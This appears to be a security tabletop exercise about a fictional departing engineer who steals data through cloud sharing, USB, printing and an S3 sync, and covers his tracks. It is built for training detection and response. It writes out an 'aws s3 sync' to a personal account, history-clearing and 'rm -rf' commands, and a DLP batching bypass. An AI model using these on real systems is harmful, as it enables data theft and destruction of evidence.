Skip to content

SC-017: Insider Threat — Data Exfiltration

Scenario Header

Type: Insider Threat  |  Difficulty: ★★★★☆  |  Duration: 2–3 hours  |  Participants: 4–8

Threat Actor: Insider — departing employee, financially motivated data theft

Primary ATT&CK Techniques: T1567.002 · T1052.001 · T1074.001 · T1048.002 · T1070.004 · T1530 · T1119

Threat Actor Profile

"Alex Chen" is a synthetic persona representing a senior software engineer at TechCorp, a mid-size SaaS company (~2,000 employees) specializing in healthcare analytics. Alex has been with TechCorp for 6 years, holds elevated access to source code repositories, customer databases, and the company's proprietary machine learning models. Alex recently accepted a position at MedAnalytics, a direct competitor, with a start date 30 days out.

Alex's access profile:

Access Level Justification
GitHub Enterprise Admin (3 repos), Write (12 repos) Lead developer on core ML platform
AWS S3 Read/Write to techcorp-ml-models-prod ML model deployment pipeline
Snowflake Analyst role, access to CUSTOMER_ANALYTICS schema Ad-hoc data analysis for product development
Google Workspace Full Drive access, external sharing enabled Collaboration with cross-functional teams
Physical access Badge access to all engineering floors, server room Senior engineer privileges

Motivation: Financial and career advancement — Alex intends to bring TechCorp's proprietary ML models and customer dataset insights to the competitor, believing this intellectual property will accelerate their new role and potentially earn a performance bonus.

Insider Threat Indicators (Pre-Incident)

The following behavioral indicators were present in the 30 days before exfiltration but were not correlated by any monitoring system:

  • Accepted competitor offer (HR knew, security was not notified)
  • Accessed 3 repositories outside normal work scope in the past 2 weeks
  • Downloaded 4.2GB from Snowflake — 3x the 90-day average
  • Searched Google Drive for "patent filing", "trade secret", "proprietary algorithm"
  • Connected a personal USB device to the corporate laptop (first time in 18 months)

Scenario Narrative

Phase 1 — Motivation & Reconnaissance (~20 min)

Alex Chen submits a 2-week resignation notice to HR on 2026-01-05. HR processes the resignation and schedules an exit interview for 2026-01-17. HR does not notify the security team or IT about the departure. This is a critical gap — TechCorp's offboarding policy requires HR to notify IT security within 24 hours of a resignation, but the process is manual (email-based) and inconsistently followed.

Between January 5 and January 10, Alex begins reconnaissance — systematically identifying the most valuable data assets accessible through existing credentials. Alex's behavior changes subtly:

  • GitHub: Clones 8 repositories outside normal work scope, including ml-core-engine (proprietary ML framework), customer-scoring-model (HIPAA-regulated customer data models), and patent-pending-algorithms
  • Snowflake: Runs 14 ad-hoc queries against CUSTOMER_ANALYTICS.PATIENT_OUTCOMES — a table Alex has access to but has never queried before
  • Google Drive: Searches for terms including "competitive analysis", "product roadmap 2026", "IP portfolio"

Evidence Artifacts:

Artifact Detail
HR System (Workday) Resignation submitted: 2026-01-05 — Last day: 2026-01-17 — IT notification: Not sent
GitHub Audit Log git clone — Repos: ml-core-engine, customer-scoring-model, patent-pending-algorithms + 5 others — User: achen@techcorp.com2026-01-06 through 2026-01-08 — 8 repos cloned (baseline: 0 new clones in prior 90 days)
Snowflake Query Log 14 queries against CUSTOMER_ANALYTICS.PATIENT_OUTCOMES — User: ACHEN — Date range: 2026-01-07 to 2026-01-09 — Data scanned: 2.1TB — Results exported: 4.2GB CSV
Google Workspace Audit Drive search queries: "competitive analysis" (3x), "product roadmap 2026" (2x), "IP portfolio" (1x) — User: achen@techcorp.com2026-01-08 to 2026-01-10
Phase 1 — Discussion Inject

Technical: Alex's Snowflake queries scanned 2.1TB of data from a table they had never previously accessed. What UEBA (User and Entity Behavior Analytics) detection rule would flag this? What baseline would you establish, and what's the threshold for alerting?

Decision: HR failed to notify security about Alex's resignation. This is a process failure, not a technology failure. How do you redesign the offboarding workflow to make security notification automatic and non-bypassable? Should security have real-time access to HR resignation data?

Expected Analyst Actions: - [ ] Establish automated HR-to-Security notification for all resignations/terminations - [ ] Trigger enhanced monitoring for departing employees — increase log retention and alert sensitivity - [ ] Review Alex's access scope — identify data assets accessible and recent access patterns - [ ] Baseline Alex's normal data access patterns (prior 90 days) for comparison - [ ] Check if Alex has accessed any data classified as HIPAA PHI, trade secret, or confidential

Phase 2 — Data Staging (~25 min)

Between January 10 and January 14, Alex begins staging data for exfiltration. The staging is methodical and designed to avoid triggering volume-based DLP alerts:

Alex uploads 2.8GB of files to a personal Google Drive account (alex.chen.personal@gmail.com) using TechCorp's Google Workspace — which allows external sharing by default. The uploads are spread across 4 days in small batches (50–200MB each) to avoid triggering the DLP policy, which only alerts on single transfers >500MB.

Files uploaded include:

  • ml-core-engine source code (1.2GB)
  • Snowflake query exports — patient outcome analytics (800MB CSV)
  • Product roadmap documents (340MB)
  • Patent-pending algorithm documentation (460MB)

On 2026-01-12, Alex connects a personal Samsung T7 USB drive (serial: S5PXNG0T123456) to the corporate MacBook Pro. The endpoint DLP agent (CrowdStrike Falcon) logs the USB connection but does not block it — TechCorp's policy allows USB storage for "business purposes" with no enforcement. Alex copies 1.4GB of ML model weights and training data to the USB drive.

On 2026-01-13, Alex prints 47 pages of algorithm documentation and architecture diagrams to the engineering floor printer (HP LaserJet, asset tag PRN-ENG-042). The print audit log captures the job but no content inspection is performed — print DLP is not deployed.

Evidence Artifacts:

Artifact Detail
Google Workspace DLP External share: achen@techcorp.comalex.chen.personal@gmail.com — Files: 23 documents, 2.8GB total — Dates: 2026-01-10 through 2026-01-14 — DLP verdict: No alert (each transfer <500MB threshold)
CrowdStrike Falcon USB device connected: Samsung T7 Portable SSD — Serial: S5PXNG0T123456 — User: achen — Host: TECHCORP-ACHEN-MBP2026-01-12T19:47:33Z — Action: Allowed (policy: monitor-only)
CrowdStrike Falcon File copy to removable media: 847 files, 1.4GB — Path: /Users/achen/repos/ml-models/weights//Volumes/Samsung_T7/2026-01-12T19:48:01Z through 2026-01-12T19:52:44Z
Print Server Log Print job: User achen — Printer: PRN-ENG-042 — Pages: 47 — Document: Algorithm_Documentation_v3.pdf2026-01-13T17:22:08Z
Phase 2 — Discussion Inject

Technical: Alex evaded the DLP policy by splitting uploads into batches under the 500MB threshold. This is a classic DLP bypass technique. How would you redesign the DLP policy to detect cumulative exfiltration over time? What role does UEBA play in complementing threshold-based DLP?

Decision: Your USB policy allows storage devices for "business purposes" with no enforcement (monitor-only). The engineering team argues that USB access is necessary for hardware development and testing. How do you implement USB controls that balance security with engineering productivity? Consider: USB device whitelisting, file-type restrictions, encryption requirements.

Expected Analyst Actions: - [ ] Review Google Workspace sharing audit for all external shares by achen@techcorp.com in the past 30 days - [ ] Analyze CrowdStrike USB device logs — identify all removable media connections for this user - [ ] Pull print audit logs for achen — look for unusual print volume or sensitive document names - [ ] Calculate total data volume across all exfiltration channels (cloud + USB + print) - [ ] Classify the exfiltrated data — determine regulatory exposure (HIPAA, trade secret)

Phase 3 — Exfiltration & Cover Tracks (~25 min)

On 2026-01-15 (2 days before the last day), Alex executes the final exfiltration and begins covering tracks:

Final Data Exfiltration:

  • Alex uses the AWS CLI from the corporate laptop to sync the techcorp-ml-models-prod S3 bucket to a personal AWS account: aws s3 sync s3://techcorp-ml-models-prod s3://personal-ml-research-2026 --source-region us-east-1 --region eu-west-1. This transfers 8.7GB of production ML model artifacts to an S3 bucket in a different AWS account and region.

Cover Track Attempts:

  • Deletes browser history and clears the Chrome profile
  • Removes locally cloned repositories from the laptop (rm -rf ~/repos/ml-core-engine ~/repos/customer-scoring-model)
  • Revokes the personal Google Drive external share (but the files remain in the personal Drive)
  • Clears bash history (history -c && rm ~/.bash_history)
  • Empties the Trash on the MacBook

What Alex Doesn't Know:

  • CrowdStrike Falcon records all file deletions and command-line activity — the rm -rf commands are fully logged
  • AWS CloudTrail logs the S3 sync operation with source and destination bucket names
  • Google Workspace retains sharing audit logs for 180 days even after shares are revoked
  • The corporate laptop's Time Machine backup (to a network share) captured a snapshot 4 hours before file deletion

Evidence Artifacts:

Artifact Detail
AWS CloudTrail S3:ListObjects + S3:GetObject × 2,847 — Source: techcorp-ml-models-prod — User: achen-dev (IAM user) — Source IP: 192.168.1.47 (corporate VPN) — 2026-01-15T21:14:22Z
AWS CloudTrail S3:PutObject × 2,847 — Destination: personal-ml-research-2026 — Account: 198765432109 (not TechCorp) — Region: eu-west-1 — Total: 8.7GB — 2026-01-15T21:14:22Z through 21:38:47Z
CrowdStrike Falcon Process: /bin/rm -rf /Users/achen/repos/ml-core-engine — User: achen2026-01-15T22:01:33Z
CrowdStrike Falcon Process: /bin/bash -c 'history -c && rm ~/.bash_history' — User: achen2026-01-15T22:03:14Z
Google Workspace Audit External share revoked: achen@techcorp.comalex.chen.personal@gmail.com — 23 documents — 2026-01-15T22:10:44ZOriginal share audit entries retained
Phase 3 — Discussion Inject

Technical: Alex attempted to cover tracks by deleting files and clearing bash history. CrowdStrike Falcon captured all of this activity. What specific EDR telemetry captures file deletion and command-line history clearing? How would you use these anti-forensic actions as positive indicators of malicious intent?

Decision: The AWS CloudTrail logs show that Alex synced 8.7GB from a corporate S3 bucket to a personal AWS account. You need to (1) revoke Alex's AWS access immediately, but Alex is still an active employee for 2 more days, and (2) determine if you can legally access Alex's personal AWS account to verify what data was taken. What are the legal boundaries? Does your employment agreement include IP assignment and data return clauses?

Expected Analyst Actions: - [ ] Immediately disable Alex's AWS IAM credentials (aws iam update-access-key --status Inactive) - [ ] Preserve CloudTrail logs with S3 Object Lock to prevent tampering - [ ] Capture a forensic image of Alex's corporate laptop before it's returned - [ ] Initiate legal hold on all of Alex's corporate data (email, Drive, Slack) - [ ] Contact legal counsel regarding the personal AWS account and data recovery options - [ ] Document the anti-forensic activity as evidence of intent

Phase 4 — Detection & Investigation (~30 min)

On 2026-01-19 (2 days after Alex's last day), the security team receives a UEBA alert from Microsoft Sentinel: "Anomalous data access pattern — departing employee". The alert fires because the UEBA system finally received the HR departure notification (sent manually by HR on January 16 — 11 days after the resignation) and retroactively correlated it with Alex's data access patterns.

The security team launches a formal insider threat investigation:

Date Activity Volume Channel
Jan 5 Resignation submitted HR
Jan 6–8 GitHub: 8 repos cloned 3.1GB Git over HTTPS
Jan 7–9 Snowflake: 14 queries, CSV export 4.2GB Snowflake UI
Jan 8–10 Drive: searches for sensitive terms Google Workspace
Jan 10–14 Drive: external sharing to personal Gmail 2.8GB Google Workspace
Jan 12 USB: file copy to Samsung T7 1.4GB USB removable media
Jan 13 Print: algorithm documentation 47 pages Network printer
Jan 15 AWS S3: sync to personal account 8.7GB AWS CLI
Jan 15 Cover tracks: file deletion, history clear Local MacBook
Total ~20.2GB + 47 pages 5 channels
  • HIPAA: Snowflake export included PATIENT_OUTCOMES table with de-identified but re-identifiable patient data — potential HIPAA breach if data is combined with other datasets
  • Trade Secret: ML model weights and patent-pending algorithms constitute trade secrets under the Defend Trade Secrets Act (DTSA)
  • Employment Agreement: Alex's employment agreement includes IP assignment clause and return-of-materials obligation
  • Computer Fraud: Unauthorized S3 sync to personal account may violate the Computer Fraud and Abuse Act (CFAA)
  • Legal hold issued on: Alex's email, Drive, Slack, GitHub activity, Snowflake query logs
  • Forensic image: MacBook Pro captured on 2026-01-17 (last day) — chain of custody form signed
  • Evidence preservation: CloudTrail, Google Workspace audit, CrowdStrike telemetry exported to write-once storage
  • Outside counsel: engaged 2026-01-19 — attorney-client privilege established for investigation

Evidence Artifacts:

Artifact Detail
Microsoft Sentinel UEBA Alert: "Anomalous data access — departing employee" — User: achen@techcorp.com — Risk score: 94/100 — Triggered: 2026-01-19T08:14:00Z — Factors: departure + volume anomaly + external sharing + USB + S3 cross-account transfer
Forensic Image MacBook Pro — Serial: C02FG123XXXX — Image hash (SHA-256): a3f7c2e1... — Captured by: Digital Forensics team — 2026-01-17T16:30:00Z
Legal Hold Notice Custodians: Alex Chen, HR Manager, direct supervisor — Scope: all electronic communications and data access logs — Issued: 2026-01-19
Time Machine Backup Network snapshot from 2026-01-15T18:00:00Z — Contains all files before deletion — Verified against forensic image
Phase 4 — Discussion Inject

Technical: The UEBA alert fired on January 19 — 14 days after the resignation and 2 days after Alex's departure. What data sources would you integrate into UEBA to enable earlier detection? How would you reduce the HR notification delay from 11 days to near-real-time?

Decision: You now have evidence that Alex exfiltrated ~20GB of data including trade secrets and potentially HIPAA-regulated data. You must decide: (1) Pursue criminal referral (CFAA, trade secret theft) vs. civil litigation (breach of employment agreement, injunctive relief to return data), or both? (2) Report to HHS/OCR as a potential HIPAA breach? (3) Notify the competitor (MedAnalytics) that their new hire may possess your trade secrets? Each decision has significant legal, reputational, and business implications.

Expected Analyst Actions: - [ ] Complete full data exfiltration inventory — classify every file by sensitivity level - [ ] Verify forensic image integrity — confirm chain of custody documentation - [ ] Prepare investigation report for legal counsel — include timeline, evidence, and regulatory exposure - [ ] Assess HIPAA breach notification requirements — was PHI involved? - [ ] Coordinate with HR on employment agreement enforcement — IP return clause - [ ] Brief executive leadership on incident scope, financial exposure, and recommended legal actions

Detection Opportunities

Phase Technique ATT&CK Detection Method Difficulty
1 Abnormal repo cloning T1213 GitHub audit: repos cloned outside normal work scope Medium
1 Unusual database queries T1530 Snowflake: queries to never-before-accessed tables by departing employee Medium
2 External cloud sharing T1567.002 Google Workspace DLP: cumulative external sharing volume (not per-transfer) Medium
2 USB file copy T1052.001 EDR: removable media file write by departing employee Easy
2 Suspicious printing T1074.001 Print audit: volume anomaly + sensitive document keywords Hard
3 Cross-account S3 sync T1537 CloudTrail: PutObject to S3 bucket in non-corporate AWS account Easy
3 Anti-forensic activity T1070.004 EDR: rm -rf on repo directories + bash history clearing Easy
4 UEBA correlation Departing employee + multi-channel data access anomaly Medium

Investigation Procedure

HR Coordination:

  • [ ] Confirm resignation date and notice period with HR
  • [ ] Review employment agreement — identify IP assignment, non-compete, and return-of-materials clauses
  • [ ] Coordinate with HR on investigation communication — avoid alerting the subject prematurely
  • [ ] Schedule exit interview to include security questionnaire (if subject hasn't departed)

Chain of Custody:

  • [ ] Forensic image of all corporate devices — document hash values and imaging process
  • [ ] Preserve all electronic evidence in write-once storage with access controls
  • [ ] Maintain detailed investigation log — who accessed what evidence, when, and why
  • [ ] Engage digital forensics firm if criminal referral is anticipated

Legal Hold:

  • [ ] Issue legal hold notice to all relevant custodians (subject, managers, HR, IT)
  • [ ] Preserve email, chat, cloud storage, and database access logs
  • [ ] Disable auto-deletion policies for the subject's accounts
  • [ ] Engage outside counsel before making any criminal or civil referral decisions

Regulatory Notification:

  • [ ] Assess HIPAA breach notification requirements (if PHI involved) — 60-day notification window
  • [ ] Assess state data breach notification laws — requirements vary by jurisdiction
  • [ ] Document all notification decisions and rationale for legal defensibility

Key Discussion Questions

  1. HR did not notify security about Alex's resignation for 11 days. How do you build an automated, reliable HR-to-Security notification pipeline? What systems should integrate?
  2. Alex used 5 different exfiltration channels (cloud sharing, USB, print, S3, Git). How do you build a unified DLP strategy that covers all channels without creating an oppressive monitoring environment?
  3. The DLP policy was threshold-based (>500MB per transfer). Alex bypassed it by splitting transfers. What alternative detection approaches (UEBA, cumulative scoring, behavioral baselines) would catch this pattern?
  4. Alex's anti-forensic activity (deleting files, clearing history) is itself an indicator of malicious intent. How do you use cover-track behavior as a detection signal without triggering false positives from legitimate housekeeping?
  5. What are the ethical boundaries of insider threat monitoring? How do you balance employee privacy with corporate data protection, particularly in jurisdictions with strong privacy laws (GDPR, CCPA)?

Debrief Guide

What Went Well

  • CrowdStrike Falcon captured comprehensive endpoint telemetry — including USB, file deletion, and command-line activity
  • AWS CloudTrail logged the cross-account S3 sync with full detail — forensic reconstruction was straightforward
  • Time Machine backup provided a recovery point for deleted files — defense in depth worked

Key Learning Points

  • HR-Security integration is the #1 insider threat control gap — departing employees must trigger enhanced monitoring automatically
  • Threshold-based DLP is easily bypassed — cumulative, behavioral, and contextual DLP is required
  • Multi-channel exfiltration is common — insiders use whatever channel is available and least monitored
  • Anti-forensic activity is a high-fidelity indicator — employees don't normally rm -rf entire repo directories and clear bash history
  • Legal preparation must precede investigation — chain of custody, legal hold, and privilege considerations are critical from day one
  • [ ] Implement automated HR → Security notification via API integration (Workday → SIEM/SOAR)
  • [ ] Deploy UEBA with specific departing-employee behavioral models
  • [ ] Enforce USB device control — block unauthorized removable media or require encryption
  • [ ] Implement cumulative DLP policies — track total data volume per user per week, not just per transfer
  • [ ] Enable print DLP — content inspection for sensitive document markers
  • [ ] Restrict S3 cross-account operations via SCP — block PutObject to non-corporate accounts
  • [ ] Add insider threat scenarios to annual security awareness training
  • [ ] Conduct quarterly access reviews for departing employees with elevated privileges

References